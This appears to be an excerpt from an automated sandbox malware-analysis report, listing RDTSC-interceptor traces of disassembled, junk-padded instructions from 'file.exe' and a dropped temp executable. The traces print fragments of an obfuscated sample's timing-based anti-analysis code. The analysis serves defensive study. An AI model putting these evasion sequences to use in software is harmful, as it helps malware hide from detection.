Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A0451 second address: 48A0497 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FFA70D2D1B2h 0x0000000b and esi, 5E82AB38h 0x00000011 jmp 00007FFA70D2D1ABh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test eax, eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FFA70D2D1B5h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A0497 second address: 48A0538 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFA707966E7h 0x00000009 or esi, 5017965Eh 0x0000000f jmp 00007FFA707966E9h 0x00000014 popfd 0x00000015 mov ch, B7h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jg 00007FFAE285468Bh 0x00000020 pushad 0x00000021 jmp 00007FFA707966E4h 0x00000026 popad 0x00000027 js 00007FFA707966F8h 0x0000002d pushad 0x0000002e mov edi, ecx 0x00000030 mov ecx, 21ABB159h 0x00000035 popad 0x00000036 cmp dword ptr [ebp-14h], edi 0x00000039 pushad 0x0000003a mov ax, 3291h 0x0000003e mov edi, eax 0x00000040 popad 0x00000041 jne 00007FFAE2854664h 0x00000047 pushad 0x00000048 mov cl, A2h 0x0000004a mov dx, B8A6h 0x0000004e popad 0x0000004f mov ebx, dword ptr [ebp+08h] 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FFA707966E8h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A0538 second address: 48A0578 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 call 00007FFA70D2D1ADh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e lea eax, dword ptr [ebp-2Ch] 0x00000011 pushad 0x00000012 jmp 00007FFA70D2D1ADh 0x00000017 popad 0x00000018 push edx 0x00000019 jmp 00007FFA70D2D1AAh 0x0000001e mov dword ptr [esp], esi 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov ax, di 0x00000027 movsx edx, si 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A0578 second address: 48A05D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FFA707966E4h 0x00000011 adc esi, 742D2568h 0x00000017 jmp 00007FFA707966DBh 0x0000001c popfd 0x0000001d popad 0x0000001e push eax 0x0000001f pushad 0x00000020 mov ecx, 39A518F1h 0x00000025 movzx eax, di 0x00000028 popad 0x00000029 nop 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FFA707966E4h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A0663 second address: 4890E08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA70D2D1B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FFAE2DEB183h 0x0000000f xor eax, eax 0x00000011 jmp 00007FFA70D068DAh 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e cmp eax, 00000000h 0x00000021 setne cl 0x00000024 xor ebx, ebx 0x00000026 test cl, 00000001h 0x00000029 jne 00007FFA70D2D1A7h 0x0000002b jmp 00007FFA70D2D31Bh 0x00000030 call 00007FFA74E5722Ah 0x00000035 mov edi, edi 0x00000037 jmp 00007FFA70D2D1B1h 0x0000003c xchg eax, ebp 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FFA70D2D1ADh 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4890E08 second address: 4890E7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFA707966E7h 0x00000009 jmp 00007FFA707966E3h 0x0000000e popfd 0x0000000f movzx ecx, di 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 jmp 00007FFA707966E2h 0x0000001b xchg eax, ebp 0x0000001c jmp 00007FFA707966E0h 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FFA707966E7h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4890E7C second address: 4890EC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 call 00007FFA70D2D1ABh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 jmp 00007FFA70D2D1B2h 0x00000015 mov esi, 7D265A71h 0x0000001a popad 0x0000001b mov dword ptr [esp], ecx 0x0000001e jmp 00007FFA70D2D1ACh 0x00000023 mov dword ptr [ebp-04h], 55534552h 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov dx, ax 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4890EC7 second address: 4890ECD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4890ECD second address: 4890ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A0AB0 second address: 48A0AB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A0AB4 second address: 48A0ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A0ABA second address: 48A0ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA707966DDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A0ACB second address: 48A0AFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA70D2D1B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov dl, 93h 0x0000000f mov edi, esi 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FFA70D2D1B1h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A0AFD second address: 48A0B11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bl, ch 0x00000011 push edx 0x00000012 pop eax 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A0B11 second address: 48A0B55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA70D2D1B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [769B459Ch], 05h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 call 00007FFA70D2D1ADh 0x00000018 pop ecx 0x00000019 jmp 00007FFA70D2D1B1h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A0BFE second address: 48A0C04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A0C04 second address: 48A0C08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A0C08 second address: 48A0C52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FFA707966E6h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FFA707966DCh 0x0000001b or cx, 9C58h 0x00000020 jmp 00007FFA707966DBh 0x00000025 popfd 0x00000026 mov eax, 0E3E6D0Fh 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A0C52 second address: 48A0C66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA70D2D1B0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A0C66 second address: 48A0CAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d jmp 00007FFA707966E9h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FFA707966E3h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A0CAD second address: 48A0CB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A0CB1 second address: 48A0CB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A0CB7 second address: 48A0CC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA70D2D1ABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A0CC6 second address: 48A0CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A0CCA second address: 48A0D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov al, F8h 0x0000000e pushfd 0x0000000f jmp 00007FFA70D2D1B3h 0x00000014 add si, C7EEh 0x00000019 jmp 00007FFA70D2D1B9h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A0D0C second address: 48A0D35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007FFAE284B527h 0x0000000e push 76952B70h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov eax, dword ptr [esp+10h] 0x0000001e mov dword ptr [esp+10h], ebp 0x00000022 lea ebp, dword ptr [esp+10h] 0x00000026 sub esp, eax 0x00000028 push ebx 0x00000029 push esi 0x0000002a push edi 0x0000002b mov eax, dword ptr [769B4538h] 0x00000030 xor dword ptr [ebp-04h], eax 0x00000033 xor eax, ebp 0x00000035 push eax 0x00000036 mov dword ptr [ebp-18h], esp 0x00000039 push dword ptr [ebp-08h] 0x0000003c mov eax, dword ptr [ebp-04h] 0x0000003f mov dword ptr [ebp-04h], FFFFFFFEh 0x00000046 mov dword ptr [ebp-08h], eax 0x00000049 lea eax, dword ptr [ebp-10h] 0x0000004c mov dword ptr fs:[00000000h], eax 0x00000052 ret 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FFA707966DDh 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A0DD5 second address: 48A0DED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA70D2D1B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C0876 second address: 48C087C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C087C second address: 48C08F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a movzx eax, bx 0x0000000d mov ebx, 75925434h 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 jmp 00007FFA70D2D1B3h 0x0000001b mov ebp, esp 0x0000001d jmp 00007FFA70D2D1B6h 0x00000022 xchg eax, esi 0x00000023 jmp 00007FFA70D2D1B0h 0x00000028 push eax 0x00000029 jmp 00007FFA70D2D1ABh 0x0000002e xchg eax, esi 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FFA70D2D1B5h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C08F2 second address: 48C08F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C08F8 second address: 48C0936 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+0Ch] 0x0000000b jmp 00007FFA70D2D1AFh 0x00000010 test esi, esi 0x00000012 jmp 00007FFA70D2D1B6h 0x00000017 je 00007FFAE2DBAC33h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C0936 second address: 48C093A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C093A second address: 48C0940 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C0940 second address: 48C09D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [769B459Ch], 05h 0x00000010 pushad 0x00000011 push eax 0x00000012 movsx edi, si 0x00000015 pop eax 0x00000016 push ebx 0x00000017 pop edx 0x00000018 popad 0x00000019 je 00007FFAE283C205h 0x0000001f jmp 00007FFA707966DCh 0x00000024 xchg eax, esi 0x00000025 jmp 00007FFA707966E0h 0x0000002a push eax 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FFA707966E1h 0x00000032 adc eax, 368A4D96h 0x00000038 jmp 00007FFA707966E1h 0x0000003d popfd 0x0000003e mov ebx, eax 0x00000040 popad 0x00000041 xchg eax, esi 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FFA707966E9h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C0AC7 second address: 48C0ACD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: E3E24D second address: E3E26B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: E3E26B second address: E3DBA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a clc 0x0000000b push dword ptr [ebp+122D1151h] 0x00000011 stc 0x00000012 call dword ptr [ebp+122D1C9Ch] 0x00000018 pushad 0x00000019 pushad 0x0000001a mov dword ptr [ebp+122D28BFh], ebx 0x00000020 pushad 0x00000021 sub cx, FB34h 0x00000026 mov edx, dword ptr [ebp+122D2CA2h] 0x0000002c popad 0x0000002d popad 0x0000002e xor eax, eax 0x00000030 jmp 00007FFA70D2D1ADh 0x00000035 mov edx, dword ptr [esp+28h] 0x00000039 jno 00007FFA70D2D1BDh 0x0000003f mov dword ptr [ebp+122D2A8Eh], eax 0x00000045 mov dword ptr [ebp+122D28BFh], edx 0x0000004b mov esi, 0000003Ch 0x00000050 clc 0x00000051 je 00007FFA70D2D1ADh 0x00000057 add esi, dword ptr [esp+24h] 0x0000005b clc 0x0000005c lodsw 0x0000005e jmp 00007FFA70D2D1B9h 0x00000063 add eax, dword ptr [esp+24h] 0x00000067 xor dword ptr [ebp+122D28BFh], esi 0x0000006d mov ebx, dword ptr [esp+24h] 0x00000071 cmc 0x00000072 nop 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 jnc 00007FFA70D2D1A6h 0x0000007c pop eax 0x0000007d rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FAF0F6 second address: FAF105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FFA707966D6h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FAF105 second address: FAF113 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FFA70D2D1A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FAF113 second address: FAF117 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FAF117 second address: FAF126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FFA70D2D1A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FAF126 second address: FAF135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FFA707966D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FAF24D second address: FAF253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FAF253 second address: FAF257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FAF257 second address: FAF25B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FAF25B second address: FAF261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FAF41D second address: FAF42F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFA70D2D1ADh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FAF5A0 second address: FAF5A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FAF5A4 second address: FAF5AE instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFA70D2D1A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FAF5AE second address: FAF5D0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FFA707966E8h 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FAF77A second address: FAF787 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFA70D2D1A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FB347C second address: FB34B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a jc 00007FFA707966D8h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pop ebx 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 pushad 0x00000018 pushad 0x00000019 jmp 00007FFA707966DEh 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 push ebx 0x00000022 pushad 0x00000023 popad 0x00000024 pop ebx 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b jno 00007FFA707966D6h 0x00000031 pop eax 0x00000032 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FB34B7 second address: E3DBA1 instructions: 0x00000000 rdtsc 0x00000002 je 00007FFA70D2D1BCh 0x00000008 jmp 00007FFA70D2D1B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jmp 00007FFA70D2D1B4h 0x00000018 pop eax 0x00000019 mov edx, dword ptr [ebp+122D2A52h] 0x0000001f push dword ptr [ebp+122D1151h] 0x00000025 mov edx, dword ptr [ebp+122D2248h] 0x0000002b call dword ptr [ebp+122D1C9Ch] 0x00000031 pushad 0x00000032 pushad 0x00000033 mov dword ptr [ebp+122D28BFh], ebx 0x00000039 pushad 0x0000003a sub cx, FB34h 0x0000003f mov edx, dword ptr [ebp+122D2CA2h] 0x00000045 popad 0x00000046 popad 0x00000047 xor eax, eax 0x00000049 jmp 00007FFA70D2D1ADh 0x0000004e mov edx, dword ptr [esp+28h] 0x00000052 jno 00007FFA70D2D1BDh 0x00000058 mov dword ptr [ebp+122D2A8Eh], eax 0x0000005e mov dword ptr [ebp+122D28BFh], edx 0x00000064 mov esi, 0000003Ch 0x00000069 clc 0x0000006a je 00007FFA70D2D1ADh 0x00000070 add esi, dword ptr [esp+24h] 0x00000074 clc 0x00000075 lodsw 0x00000077 jmp 00007FFA70D2D1B9h 0x0000007c add eax, dword ptr [esp+24h] 0x00000080 xor dword ptr [ebp+122D28BFh], esi 0x00000086 mov ebx, dword ptr [esp+24h] 0x0000008a cmc 0x0000008b nop 0x0000008c push eax 0x0000008d push edx 0x0000008e push eax 0x0000008f jnc 00007FFA70D2D1A6h 0x00000095 pop eax 0x00000096 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FB353D second address: FB359F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFA707966EDh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jp 00007FFA707966DCh 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007FFA707966D8h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f push 7568777Fh 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push esi 0x00000039 pop esi 0x0000003a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FB359F second address: FB35B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA70D2D1ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FB35B0 second address: FB35B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FB373A second address: FB376C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FFA70D2D1A6h 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop ebx 0x00000012 jmp 00007FFA70D2D1B2h 0x00000017 popad 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c jnp 00007FFA70D2D1AEh 0x00000022 push ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FB376C second address: FB37C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [eax] 0x00000007 je 00007FFA707966DAh 0x0000000d push ecx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push edi 0x00000016 jnl 00007FFA707966E2h 0x0000001c pop edi 0x0000001d pop eax 0x0000001e or dl, FFFFFF91h 0x00000021 lea ebx, dword ptr [ebp+124493C0h] 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007FFA707966D8h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 00000017h 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 push eax 0x00000042 push edi 0x00000043 push eax 0x00000044 push edx 0x00000045 jne 00007FFA707966D6h 0x0000004b rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FC406E second address: FC4078 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FFA70D2D1A6h 0x0000000a rdtsc
